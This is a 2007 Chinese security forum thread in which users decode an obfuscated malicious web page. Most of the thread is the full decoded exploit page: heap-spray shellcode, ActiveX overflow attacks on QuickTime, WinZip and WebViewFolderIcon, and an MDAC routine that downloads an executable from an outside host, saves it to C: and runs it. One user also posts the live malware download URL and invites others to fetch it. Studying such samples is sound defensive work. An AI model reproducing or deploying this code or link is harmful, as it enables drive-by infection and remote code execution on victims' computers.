【脚本】解密讨论

lsyer

偶水平有限....
呵呵
找JM的斑斑hzqedison帮忙

Cloud018

看到这样的乱码，我第一反应是用SCRENC脚本编码器把脚本加密了

pluto1313

解密两次就出来了
http://dodo32.org/505/Xp//file.php
对应下载 file.exe

点击上面那个网址直接下载exe文件，自己测试吧

之前lsyer说的有误，file.php前面是“//”，单斜杠是无法下载病毒的

[ 本帖最后由 pluto1313 于 2007-8-16 21:45 编辑 ]

jimmyleo

第二层

</textarea><html>
<head>
<title></title>
<script language="JavaScript">
var memory = new Array();
var mem_flag = 0;
function having() { memory=memory; setTimeout("having()", 2000); }
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%
uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%
uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%
u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%
uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%
u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%
u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%
ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%
u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%
u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%
uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%
u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%
uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u642F%u646F%u336F%u2E32%u726F%u2F67%
u3035%u2F35%u7058%u2F2F%u6966%u656C%u702E%u7068");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
{
  memory = spraySlide + payLoadCode;
}

mem_flag = 1;
having();
return memory;
}
function startWVF()
{
for (i=0;i<128;i++)
{
  try{
   var o = new ActiveXObject
('WebViewFold'+'erIcon'+'.Web'+'ViewFolderIcon'+'.1');
   sslic (o);
  }catch(e){}
}
}
function sslic(obj) { obj.setSlice ( 0x7ffffffe , 0x0c0c0c0c , 0x0c0c0c0c , 0x0c0c0c0c ); }
function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
function startOverflow(num)
{
if (num == 0) {
  try {
   var qt = new ActiveXObject('QuickTime.QuickTime');  
   if (qt) {
    var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-
BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
    '<param name="src" value="qt.php">'+
    '<param name="autoplay" value="true">'+
    '<param name="loop" value="false">'+
    '<param name="controller" value="true">'+
    '</object>';
    if (! mem_flag) makeSlide();
    document.getElementById('mydiv').innerHTML = qthtml;
    num = 255;
   }
  } catch(e) { }
  if (num = 255) setTimeout("startOverflow(1)", 2000);
  else startOverflow(1);
} else if (num == 1) {
  try {
   var winzip = document.createElement("object");
   winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-
BA413F034904");
   var ret=winzip.CreateNewFolderFromName(unescape("%00"));
   if (ret == false) {
    if (! mem_flag) makeSlide();
    startWinZip(winzip);
    num = 255;
   }
  } catch(e) { }
  if (num = 255) setTimeout("startOverflow(2)", 2000);
  else startOverflow(2);
} else if (num == 2) {
  try {
   var tar = new ActiveXObject
('WebViewFolderIcon.WebViewFolderIcon.1');
   if (tar) {
    if (! mem_flag) makeSlide();
    startWVF();
   }
  } catch(e) { }
}
}

function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
  var rnum = Math.floor(Math.random() * chars.length);
  randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
function XMLHttpDownload(xml, url) {
try {
  xml.open("GET", url, false);
  xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
function ADOBDStreamSave(o, name, data) {
try {
  o.Type = 1;
  o.Mode = 3;
  o.Open();
  o.Write(data);
  o.SaveToFile(name, 2);
  o.Close();
} catch(e) { return 0; }
return 1;
}
function ShellExecute(exec, name, type) {
if (type == 0) {
  try { exec.Run(name, 0); return 1; }
catch(e) { }
} else {
  try { exe.ShellExecute(name); return 1; } catch(e) { }
}
return(0);
}
function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-
983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-
000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-
dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-
339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-
874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-
25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://dodo32.org/505/Xp//file.php';
while (t && (! v[0] || ! v[1] || ! v[2]) ) {
  var a = null;
  try {
   a = document.createElement("object");
   a.setAttribute("classid", "clsid:" + t.substring(1, t.length
- 1));
  } catch(e) { a = null; }
  
  if (a) {
   if (! v[0]) {
    v[0] = CreateObject(a, "msxml2.XMLHTTP");
    if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
    if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
   }
   if (! v[1]) {
    v[1] = CreateObject(a, "ADODB.Stream");
   }
   if (! v[2]) {
    v[2] = CreateObject(a, "WScript.Shell");
    if (! v[2]) {
     v[2] = CreateObject(a, "Shell.Application");
     if (v[2]) n=1;
    }
   }
  }
  i++;
}
if (v[0] && v[1] && v[2]) {
  var data = XMLHttpDownload(v[0], urlRealExe);
  if (data != 0) {
   var name = "c:\\msnt"+GetRandString(4)+".exe";
   if (ADOBDStreamSave(v[1], name, data) == 1) {
    if (ShellExecute(v[2], name, n) == 1) {
     ret=1;
    }
   }
  }
}
return ret;
}
function start() {
if (! MDAC() ) { startOverflow(0); }
}
</script>
</head>
<body >
<div id="mydiv"></div>
</body>
</html>

[ 本帖最后由 jimmyleo 于 2007-8-16 22:00 编辑 ]

jimmyleo

orbit会识别的

还有一个 利用quicktime漏洞的 巨长的地址……

待会发上来

小邪邪

咖啡杀

wangfeng66

F:\xp.htm\Script.0 - infected with VBS.PackFor
drweb

icka

1. 
   
2. var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
   
3. "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%
   
4. uef03%uefeb" +
   
5. "%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%
   
6. uaa66%ub9e7" +
   
7. "%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%
   
8. u2e87%u0a96" +
   
9. "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%
   
10. uebaa%uee85" +
    
11. "%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%
    
12. u66bf%ucfaa" +
    
13. "%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%
    
14. u288a%uebaf" +
    
15. "%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%
    
16. ubc34%u10bc" +
    
17. "%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%
    
18. u64b6%uf7ba" +
    
19. "%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%
    
20. u0eec%u0eec" +
    
21. "%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%
    
22. uec97%ub91c" +
    
23. "%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%
    
24. u1e04%u11d4" +
    
25. "%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%
    
26. uefe7%u1b07" +
    
27. "%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u642F%u646F%u336F%u2E32%u726F%u2F67%
    
28. u3035%u2F35%u7058%u2F2F%u6966%u656C%u702E%u7068");
    
29. 
    

复制代码

这部分是用的QUICKTIME的漏洞么？
不是很清楚哦。。就知道肯定是用的啥漏洞，jimmyleo 能告之下么？

jimmyleo

function startOverflow(num)
{
if (num == 0) {
  try {
   var qt = new ActiveXObject('QuickTime.QuickTime');  
   if (qt) {
    var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-
BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
    '<param name="src" value="qt.php">'+
    '<param name="autoplay" value="true">'+
    '<param name="loop" value="false">'+
    '<param name="controller" value="true">'+
    '</object>';
    if (! mem_flag) makeSlide();
    document.getElementById('mydiv').innerHTML = qthtml;
    num = 255;
   }
  } catch(e) { }
  if (num = 255) setTimeout("startOverflow(1)", 2000);
  else startOverflow(1);
} else if (num == 1) {
  try {
   var winzip = document.createElement("object");
   winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-
BA413F034904");
   var ret=winzip.CreateNewFolderFromName(unescape("%00"));
   if (ret == false) {
    if (! mem_flag) makeSlide();
    startWinZip(winzip);
    num = 255;
   }
  } catch(e) { }
  if (num = 255) setTimeout("startOverflow(2)", 2000);
  else startOverflow(2);
} else if (num == 2) {
  try {
   var tar = new ActiveXObject
('WebViewFolderIcon.WebViewFolderIcon.1');
   if (tar) {
    if (! mem_flag) makeSlide();
    startWVF();
   }
  } catch(e) { }
}
}

是这部分 名字都写出来了

icka

哦，看到了。
这么说这页是用了2个漏洞咯？
一个是这个，地址是从u7468%u7074%u2F3A%u642F%u646F%u336F%u2E32%u726F%u2F67%
u3035%u2F35%u7058%u2F2F%u6966%u656C%u702E%u7068看到
一个是MS06-014，地址是明文

对吧